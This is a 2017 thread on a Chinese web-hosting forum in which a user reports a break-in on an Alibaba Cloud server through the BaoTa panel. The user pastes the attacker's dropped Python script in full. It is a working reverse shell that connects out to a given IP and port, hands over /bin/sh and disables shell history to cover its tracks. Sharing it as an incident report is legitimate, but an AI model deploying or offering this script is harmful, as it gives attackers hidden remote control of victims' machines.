全球主机交流论坛

标题: 有台阿里云被疑似论坛MJJ的人给爆破了 @modianxia [打印本页]

作者: 宝创    时间: 2017-1-20 10:11
标题: 有台阿里云被疑似论坛MJJ的人给爆破了 @modianxia
难道是宝塔的bug?
他先登陆了宝塔 然后建了个b.py
但是宝塔我都更改了默认用户名的 他还是用admin登陆成功了
然后登陆了ssh 我正准备睡觉呢 收到了阿里云的通知 我就先关机了
py内容

  1. # -*- coding:utf-8 -*-
  2. #!/usr/bin/env python
  3. """
  4. back connect py version,only linux have pty module
  5. code by google security team
  6. """
  7. import sys,os,socket,pty
  8. shell = "/bin/sh"
  9. def usage(name):
  10.     print 'python reverse connector'
  11.     print 'usage: %s <ip_addr> <port>' % name

  12. def main():
  13.     if len(sys.argv) < 3:
  14.         usage(sys.argv[0])
  15.         sys.exit()
  16.     s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  17.     try:
  18.         if sys.argv[3] == 'udp' :
  19.             s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
  20.     except:pass
  21.     try:
  22.         s.connect((sys.argv[1],int(sys.argv[2])))
  23.         print 'connect ok'
  24.     except:
  25.         print 'connect faild'
  26.         sys.exit()
  27.     os.dup2(s.fileno(),0)
  28.     os.dup2(s.fileno(),1)
  29.     os.dup2(s.fileno(),2)
  30.     global shell
  31.     os.unsetenv("HISTFILE")
  32.     os.unsetenv("HISTFILESIZE")
  33.     os.unsetenv("HISTSIZE")
  34.     os.unsetenv("HISTORY")
  35.     os.unsetenv("HISTSAVE")
  36.     os.unsetenv("HISTZONE")
  37.     os.unsetenv("HISTLOG")
  38.     os.unsetenv("HISTCMD")
  39.     os.putenv("HISTFILE",'/dev/null')
  40.     os.putenv("HISTSIZE",'0')
  41.     os.putenv("HISTFILESIZE",'0')
  42.     pty.spawn(shell)
  43.     s.close()

  44. if __name__ == '__main__':
  45.     main()
复制代码

阿里云
(, 下载次数: 2)
作者: liangcq132    时间: 2017-1-20 10:22
是哪个mjj这么厉害
作者: tsk    时间: 2017-1-20 13:55
不明觉厉!
作者: qweasdzxc123    时间: 2017-1-20 13:58
楼下对此事负责
作者: lsza    时间: 2017-1-20 14:08
宝塔用完了我一般都是删面板..
作者: modianxia    时间: 2017-1-20 16:07
测试到mjj的机器了,哈哈




欢迎光临 全球主机交流论坛 (https://52.ht/) Powered by Discuz! X3.4